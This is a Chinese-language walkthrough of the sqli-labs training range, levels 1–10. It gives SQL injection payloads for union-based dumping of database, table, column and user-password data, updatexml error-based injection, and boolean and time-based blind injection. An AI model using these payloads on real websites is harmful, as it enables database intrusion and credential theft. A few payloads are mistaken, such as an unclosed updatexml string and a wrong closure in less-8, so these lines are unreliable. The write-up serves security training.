sqli-lab靶场通关

文章目录

  • less-1
  • less-2
  • less-3
  • less-4
  • less-5
  • less-6
  • less-7
  • less-8
  • less-9
  • less-10

less-1

1、提示输入参数id,且值为数字;
sqli-lab靶场通关_第1张图片
sqli-lab靶场通关_第2张图片

2、判断是否存在注入点

	id=1'

sqli-lab靶场通关_第3张图片

报错,说明存在 SQL注入漏洞。

3、判断字符型还是数字型
在这里插入图片描述

	id=1 and 1=1 --+
	id=1 and 1=2 --+
	id=1" --+

注意,注释#可能没有--+好使

sqli-lab靶场通关_第4张图片

sqli-lab靶场通关_第5张图片

两次页面返回均正常,说明为字符型注入。

下面判断闭合类型:
sqli-lab靶场通关_第6张图片

也可以从报错的地方看出是单引号闭合。

sqli-lab靶场通关_第7张图片

可以看出是单引号闭合。
综上,该关卡属于字符型注入,且闭合符号为单引号。

4、判断字段数

	id=1' order by 3 --+

sqli-lab靶场通关_第8张图片

字段数为三,也就是说sql查询的结果中,有三列数据。

5、查看回显点

	id=-1' union select 1,2,3 --+

sqli-lab靶场通关_第9张图片

注意:要确保union select前面的语句,也就是id在数据库中是不存在的,才会看到回显点。

6、查看数据库名

	id=-1' union select 1,(select database()),3 --+

sqli-lab靶场通关_第10张图片

可以得到数据库名为security.

7、查看表名

	id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

sqli-lab靶场通关_第11张图片

可以看出security表中,有四张表。

8、查看字段名

	id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

sqli-lab靶场通关_第12张图片

9、查看字段值

	id=-1' union select 1,(select group_concat(concat(username,'%23',password)) from security.users),3 --+

sqli-lab靶场通关_第13张图片

下面主要介绍思路,就不全流程走完了。

less-2

sqli-lab靶场通关_第14张图片
1、判断是否存在注入漏洞

	id=1' 

sqli-lab靶场通关_第15张图片

说明存在SQL注入漏洞。

2、判断字符型还是数字型

	id=1 and 1=1 --+
	id=1 and 1=2 --+

sqli-lab靶场通关_第16张图片
sqli-lab靶场通关_第17张图片

说明属于数字型注入。

3、判断字段数

	id=1 order by 3 --+

sqli-lab靶场通关_第18张图片>后面的步骤和前一关一样,在这里不在赘述。

less-3

1、用单引号判断是否存在sql注入。
sqli-lab靶场通关_第19张图片

说明存在sql注入漏洞。

2、判断字符型还是数字型
sqli-lab靶场通关_第20张图片
sqli-lab靶场通关_第21张图片

返回正常,说明属于字符型注入。

下面确定闭合符号:
sqli-lab靶场通关_第22张图片

从这里看出,后端代码是在id值后面加了'),再进行查询的。
所以,闭合符号为')

sqli-lab靶场通关_第23张图片
sqli-lab靶场通关_第24张图片

less-4

用单引号判断是否存在sql注入。
sqli-lab靶场通关_第25张图片

单引号不行,试试双引号,

sqli-lab靶场通关_第26张图片

说明存在SQL注入漏洞。单引号没反应,只能说明此处的闭合方式没用到单引号,试试其他符号。

sqli-lab靶场通关_第27张图片

从这里可以看出,闭合方式是双引号+单括号。最外面的那个单引号是为了区分其他无关报错信息。
sqli-lab靶场通关_第28张图片

less-5

用单引号判断是否存在SQL注入漏洞
sqli-lab靶场通关_第29张图片

可以看到,存在SQL注入漏洞,且闭合符号为单引号。

sqli-lab靶场通关_第30张图片

因为页面没有回显,所以,这里,我们不能用联合查询,需要用盲注。

sqli-lab靶场通关_第31张图片

sqli-lab靶场通关_第32张图片

可以看到,此处只有两种页面显示,可以使用布尔盲注;
因为有报错,所以也可以使用报错注入。

使用盲注,直接判断数据库长度

	id=1' and length(database())=8 --+ //判断数据库名长度

sqli-lab靶场通关_第33张图片

说明当前数据库名的长度为8,这里就不演示布尔盲注,太麻烦了~盲注。

这里使用报错注入进行演示:
(1)查数据库名

	id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

sqli-lab靶场通关_第34张图片
(2)查表名

	id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+ 

sqli-lab靶场通关_第35张图片
(3)查字段名

	id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 

sqli-lab靶场通关_第36张图片
(4)查字段值

	id=1' and updatexml(1,concat(0x7e,(select group_concat(concat(username,'%23',password)) from security.users),0x7e),1) --+ 

sqli-lab靶场通关_第37张图片

注意:该语句对输出的字符长度也做了限制,其最长输出32位。

less-6

单引号判断是否存在sql注入漏洞;
sqli-lab靶场通关_第38张图片
单引号不行,双引号上,成了~
sqli-lab靶场通关_第39张图片
可以看出,只有双引号闭合,故试试:
sqli-lab靶场通关_第40张图片
既然有报错,那就用报错注入吧~

查数据库名

	id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

sqli-lab靶场通关_第41张图片

后面就不多赘述了~

less-7

用单引号判断是否存在sql注入
sqli-lab靶场通关_第42张图片
sqli-lab靶场通关_第43张图片

页面返回不一样,所以存在SQL注入漏洞,但是没有报错也没有回显,只能使用盲注。

需要试试,出来闭合符号为'))
sqli-lab靶场通关_第44张图片

使用布尔盲注,直接判断数据库长度

	id=1')) and length(database())=8 --+ //判断数据库名长度

sqli-lab靶场通关_第45张图片

less-8

sqli-lab靶场通关_第46张图片
sqli-lab靶场通关_第47张图片
sqli-lab靶场通关_第48张图片

通过单引号判断存在 sql注入漏洞;同时,发现闭合引号就是单引号。因为此处没有报错,也没有回显,只能用布尔盲注。

使用布尔盲注,直接判断数据库长度

	id=1')) and length(database())=8 --+ //判断数据库名长度

sqli-lab靶场通关_第49张图片

less-9

这一关需要用时间盲注,payload:

	id=1 and sleep(5) --+ //数字型则等待5秒
	id=1' and sleep(5) --+ //字符型则等待5秒

sqli-lab靶场通关_第50张图片

可知存在SQL注入漏洞,闭合符号为单引号,且类型属于时间盲注。

使用时间盲注,直接判断数据库长度

	id=1' and if(length(database())=8,sleep(5),1) --+ //猜数据库名长度

sqli-lab靶场通关_第51张图片

数据库长度为8,后续就是一个一个字母猜数据库名,然后表名、字段名、字段内容,在这里不在赘述。

less-10

这一关与前一关得区别主要是,闭合符号换成了双引号,其余都一样。
sqli-lab靶场通关_第52张图片

你可能感兴趣的:(渗透测试实践,安全)